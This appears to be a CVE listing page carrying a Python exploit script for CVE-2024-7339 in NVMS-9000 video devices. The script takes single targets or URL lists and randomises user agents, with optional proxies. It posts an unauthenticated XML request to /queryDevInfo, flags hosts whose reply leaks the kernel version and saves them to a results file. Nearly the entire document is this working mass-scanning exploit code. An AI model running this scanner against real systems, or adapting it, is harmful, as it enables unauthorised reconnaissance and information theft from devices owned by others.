4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import asyncio
import argparse
import aiofiles
from alive_progress import alive_bar
from fake_useragent import UserAgent
from colorama import Fore, Style
import ssl
import httpx
import random
import os
import re
import json
import xml.etree.ElementTree as ET
import anyio

green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [ green, cyan, blue]
random_color = random.choice(colors)

def banner():
    banner = f"""{bold}{random_color}
    ______     ____  __         _ ______
   / ____/  __/ __ \/ /  ____  (_)_  __/__  _____
  / __/ | |/_/ /_/ / /  / __ \/ / / / / _ \/ ___/
 / /____>  </ ____/ /__/ /_/ / / / / /  __/ /
/_____/_/|_/_/   /_____|____/_/ /_/  \___/_/

                    {bold}{white}@RevoltSecurities{reset}\n"""

    return banner

print(banner())

parser = argparse.ArgumentParser(description=f"[{bold}{blue}Description{reset}]: {bold}{white}Vulnerability Detection and Exploitation  tool for  CVE-2024-7339" , usage=argparse.SUPPRESS)
parser.add_argument("-u", "--url", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a URL or domain for vulnerability detection")
parser.add_argument("-l", "--list", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a list of URLs for vulnerability detection")
parser.add_argument("-t", "--threads", type=int, default=1, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Number of threads for list of URLs")
parser.add_argument("-proxy", "--proxy", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Proxy URL to send request via your proxy")
parser.add_argument("-v", "--verbose", action="store_true", help=f"[{bold}{blue}INF{reset}]: {bold}{white}Increases verbosity of output in console")
parser.add_argument("-o", "--output", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Filename to save output of vulnerable target{reset}]")
args=parser.parse_args()

async def save(result):
    try:
            if args.output:
                if os.path.isfile(args.output):
                    filename = args.output
                elif os.path.isdir(args.output):
                    filename = os.path.join(args.output, f"results.txt")
                else:
                    filename = args.output
            else:
                    filename = "results.txt"
            async with aiofiles.open(filename, "a") as w:
                    await w.write(result + '\n')
    except KeyboardInterrupt as e:
        quit()
    except asyncio.CancelledError as e:
        SystemExit
    except Exception as e:
        pass


async def exploit(session, url, sem, bar):
    try:
        url = url.rstrip("/")
        base_url =f"{url}/queryDevInfo"
        headers = {
            "Accept-Language": "en-US,en;q=0.9",
            "Accept-Encoding": "gzip, deflate",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Upgrade-Insecure-Requests": "1",
            "Connection": "keep-alive",
            "User-Agent": UserAgent().random,
            "Content-Length": "103"
        }
        payload = '<?xml version="1.0" encoding="utf-8" ?><request version="1.0" systemType="NVMS-9000" clientType="WEB"/>'
        response = await session.request("POST", base_url,data=payload , headers=headers, timeout=30, follow_redirects=True)

        if response.status_code != 200:
            return

        responsed = await response.aread()
        responsed = responsed.decode('utf-8')
        if "</kenerlVersion>" in responsed:
            root = ET.fromstring(responsed)
            kernal = root.find("kenerlVersion").text
            print(f"[{bold}{green}Vuln{reset}]: {bold}{white}{url} - Kernal Version: {kernal}{reset}")
            await save(f"{url} - Kernal Version: {kernal}")
        
    except (httpx.ConnectError, httpx.RequestError, httpx.TimeoutException) as e:
        return
    except ssl.SSLError as e:
        pass
    except httpx.InvalidURL:
        pass
    except KeyboardInterrupt :
        SystemExit
    except asyncio.CancelledError:
        SystemExit
    except anyio.EndOfStream:
        pass
    except Exception as e:
        if args.verbose:
            print(f"Exception in request: {e}, {type(e)}")
    finally:
        sem.release()
        bar()


async def loader(urls, session, sem, bar):
    try:
        tasks = []
        for url in urls:
            await sem.acquire()
            task = asyncio.ensure_future(exploit(session, url, sem, bar))
            tasks.append(task)

        await asyncio.gather(*tasks, return_exceptions=True)
    except KeyboardInterrupt as e:
        SystemExit
    except asyncio.CancelledError as e:
        SystemExit
    except Exception as e:
        print(f"Exception in loader: {e}, {type(e)}")


async def threads(urls):
    try:
        urls = list(set(urls))
        sem = asyncio.BoundedSemaphore(args.threads)
        proxy = args.proxy if args.proxy else None
        async with httpx.AsyncClient(verify=False, proxy=proxy) as session:
            with alive_bar(title=f"{bold}{white}Exploiter{reset}", total=len(urls), enrich_print=False) as bar:
                await loader(urls, session, sem, bar)
    except RuntimeError as e:
        pass
    except KeyboardInterrupt as e:
        SystemExit
    except Exception as e:
        if args.verbose:
            print(f"Exception in threads: {e}, {type(e)}")


async def main():
    try:
        urls = []
        if args.url:
            if args.url.startswith("https://") or args.url.startswith("http://"):
                urls.append(args.url)
            else:
                new_url = f"https://{args.url}"
                urls.append(new_url)
                new_http = f"http://{args.url}"
                urls.append(new_http)
            await threads(urls)

        if args.list:
            async with aiofiles.open(args.list, "r") as streamr:
                async for url in streamr:
                    url = url.strip()
                    if url.startswith("https://") or url.startswith("http://"):
                        urls.append(url)
                    else:
                        new_url = f"https://{url}"
                        urls.append(new_url)
                        new_http = f"http://{url}"
                        urls.append(new_http)
            await threads(urls)

    except FileNotFoundError as e:
        print(f"[{bold}{red}WRN{reset}]: {bold}{white}{args.list} no such file or directory{reset}")
        SystemExit

    except Exception as e:
        print(f"Exception in main: {e}, {type(e)}")

if __name__ == "__main__":
    asyncio.run(main())